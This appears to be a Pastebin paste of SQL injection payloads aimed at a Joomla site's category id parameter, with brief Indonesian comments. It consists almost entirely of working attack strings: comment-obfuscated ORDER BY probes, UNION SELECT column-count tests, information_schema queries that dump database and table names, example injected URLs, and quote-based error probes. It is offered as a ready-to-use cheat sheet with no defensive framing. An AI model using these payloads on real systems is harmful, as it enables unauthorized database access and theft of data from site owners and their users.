Advertisement
iiFear

SQLi Injection 1337

Sep 10th, 2016
349
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.04 KB | None | 0 0
  1.  
  2. /*/
  3. /**/
  4. /*.*/
  5.  
  6. order+by
  7. 77/*/order/*/by/*/27--
  8. =77/**/order/**/by/**/27--
  9. =77/*.*/order/*.*/by/*.*/27--
  10. having
  11. group by
  12. show by
  13.  
  14. union select 1,2,3,4,5,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
  15. - <<-- awal perintah
  16. -- akhir perintah
  17. FROM information_schema
  18. schemata
  19. FROM information_schema.schemata--
  20.  
  21. UNION SELECT 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17,18,1
  22. 9,20,21,22,23,24,25,26 FROM information_schema.schemata--
  23. http://localhost/nama folder joomla kalian/index.php/hacking-faq?view=category&id=77 UNION SELECT
  24.  
  25. 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM information_schema.tables WHERE table_schema=database()--
  26.  
  27. http://localhost/nama folder joomla kalian/index.php/hacking-faq?view=category&id=-77 UNION SELECT 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 FROM information_schema.tables WHERE table_schema=database()--
  28.  
  29.  
  30. error bases
  31. category&id=77'
  32. category&id=-77
  33. category&id=.77
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement